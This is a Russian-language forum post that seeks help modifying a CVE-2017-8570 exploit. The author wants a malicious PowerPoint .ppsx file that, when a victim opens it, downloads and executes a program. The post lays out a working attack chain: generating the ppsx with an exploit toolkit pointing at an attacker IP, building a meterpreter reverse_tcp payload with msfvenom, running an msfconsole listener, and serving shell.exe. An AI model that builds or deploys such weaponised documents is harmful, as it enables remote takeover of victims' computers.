Думаю многие слышали об эксплойте
CVE-2017-8570. Суть эксплойта в том, что создается файл презентации, и вшивается туда загрузчик. Когда жертва запустила файл, у вас в терминале линукса через слушатель открывается доступ к пк жертвы. Так же, более коротко на rus этот эксплоит описан
тутМне нужно переделать, чтобы при запуске файла презентации, скачивалась программа putty(portable) и запускалась. Прямая ссылка
https://the.earth.li/~sgtatham/putty/latest/w32/putty.exeВот ниже все команды, если делать вместе со слушателем. Но так как слушатель не нужен, то тут будут походу только две команды, подскажите как правильно будет прописать их, чтобы сгенерировать ppsx, и после запуска - качался и запускался мой putty.exe по указанной ссылке (
https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe)
python cve-2017-8570_toolkit.py -M gen -w Invoke.ppsx -u http://ВашАйпи/logo.doc
msfvenom -p windows/meterpreter/reverse_tcp LHOST=ВашАйпи LPORT=4444 -f exe > /tmp/shell.exe
msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST ВашАйпи; set LPORT 4444; run"
python cve-2017-8570_toolkit.py -M exp -e http://ВашАйпи/shell.exe -l /tmp/shell.exe